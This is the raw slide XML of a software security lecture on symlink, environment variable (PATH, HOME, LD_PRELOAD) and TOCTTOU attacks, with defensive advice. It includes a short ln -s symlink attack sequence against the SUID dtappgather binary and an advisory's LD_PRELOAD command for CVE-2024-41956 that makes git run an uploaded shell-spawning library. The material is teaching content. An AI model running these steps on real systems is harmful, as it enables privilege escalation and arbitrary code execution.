                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BFA5286-9529-1474-ED7C-4D783D40BEF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A9E4A8-EC65-BCED-19D0-8534F4974CBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1337037" y="1200150"/>
            <a:ext cx="6947907" cy="3271306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1053363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r>
              <a:rPr lang="en-US"/>
              <a:t>The dtappgather Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523269" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dtappgather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> utility was shipped with the Common Desktop Environment (CDE) as a SUID binary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dtappgather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> uses a directory with permissions 0555 to create temporary files used by each login session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>appconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>appmanager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/generic-display-0 is not checked for existence prior to the opening of the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> -l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-r-------- 1 root other 1500 Dec 29 18:21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ln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> -s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 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>var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dt</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appconfig</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appmanager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>/generic-display-0</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dtappgather</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>MakeDirectory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>var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dt</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appconfig</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appmanager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>/generic-display-0: File exists</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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> -l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-r-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>xr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xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>-x 1 user users 1500 Dec 29 18:21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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2746019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The type of file being referenced by a path should be checked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For unexpected types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For symbolic links</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similarly to path traversal mitigation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>realpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() can be used to assess canonic paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Temporary files should not be predictable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mkstemp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2228437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F2AA-04FB-25CA-EEF5-246F1150EA1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Environment Variable Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{999FC5AF-DA74-2279-7045-DDDFE5BC442E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8229600" cy="3753890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operating systems define environment variables that can be used to modify the behavior of programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If these variables are under the control of an attacker, trust in the variable contents might lead to security policy violations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CWE-642: External Control of Critical State Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CWE-454: External Initialization of Trusted Variables or Data Stores</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1711624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Environment Variables Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PATH environment variable determines how the shell searches for commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an application invokes commands without specifying the complete path, it is possible to induce an application to execute a different version (controlled by the attacker) of the external command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() use the shell PATH variable to locate applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The HOME environment variable determines how the home directory path is expanded by the shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an application uses using a home-relative path  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(e.g., ~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>myfile.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), an attacker can modify their $HOME variable to control which files are accessed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The LD_PRELOAD environment variable can be used to specify a library that overrides standard components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283242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Vulnerability Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application vulnerability analysis is the process of identifying vulnerabilities in applications, as deployed in a specific operational environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deployment vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202086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8EC-27E7-B4D0-2687-212A259E8CD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CVE-2024-32019</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98B358B5-1495-6079-067A-90BA6991964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E43856B-0FE9-8A19-C64E-8AEFFD8868C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1706096" y="1200150"/>
            <a:ext cx="5105730" cy="3624274"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3380063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A705-4F2B-EABA-542A-2D1084099555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CVE-2024-41956</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03DC792C-28C0-0C1F-3B06-DDB68C9E3D0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F109C55-E6AB-CE6B-89EE-3CB2615FB2DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Soft Serve passes all environment variables given by the client to git subprocesses. This includes environment variables that control program execution, such as LD_PRELOAD.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can be exploited to execute arbitrary code by, for example, uploading a malicious shared object file to Soft Serve via Git LFS (uploading it via LFS ensures that it is not compressed on disk and easier to work with). The file will be stored under its SHA256 hash, so it has a predictable name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This file can then be referenced in LD_PRELOAD via a Soft Serve SSH session that causes git to be invoked. For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LD_PRELOAD=/.../data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/1/objects/a2/b5/a2b585befededf5f95363d06d83655229e393b1b45f76d9f989a336668665a2f ssh server git-upload-pack repo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The example LFS file patches a shared library function called by git to execute a shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DAA2A45-DB70-3312-23C7-B2D4FA2ACD8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="125129" y="1191107"/>
            <a:ext cx="4423725" cy="2909255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0F6248D-47B4-5BAA-B677-08725AC5E387}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6867667" y="2606137"/>
            <a:ext cx="4158511" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>charmbracelet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>/soft-serve/security/advisories/GHSA-m445-w3xr-vp2f</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4250598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Understanding how environment variables affect the execution of programs (and other actions as well) is important</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Absolute paths should always be used when executing external commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Home-relative paths should never be used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In some cases, emptying the environment can be an effective defensive approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C/C++ on Linux: call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>clearenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(), if available, or set the global variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>environ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to NULL </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3220308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8" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TOCTTOU Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="622599" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker may race against the application by exploiting the gap between testing and accessing the file (time-of-check-to-time-of-use)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time-Of-Check (t1): validity of assumption A on entity E is checked </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time-Of-Use (t2): E is used, assuming A is still valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time-Of-Attack (t3): assumption A is invalidated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>t1 &lt; t3 &lt; t2 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data race condition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Conflicting accesses of multiple processes to shared data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At least one of them is a write access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="b">
              <a:spcAft>
                <a:spcPts val="150"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
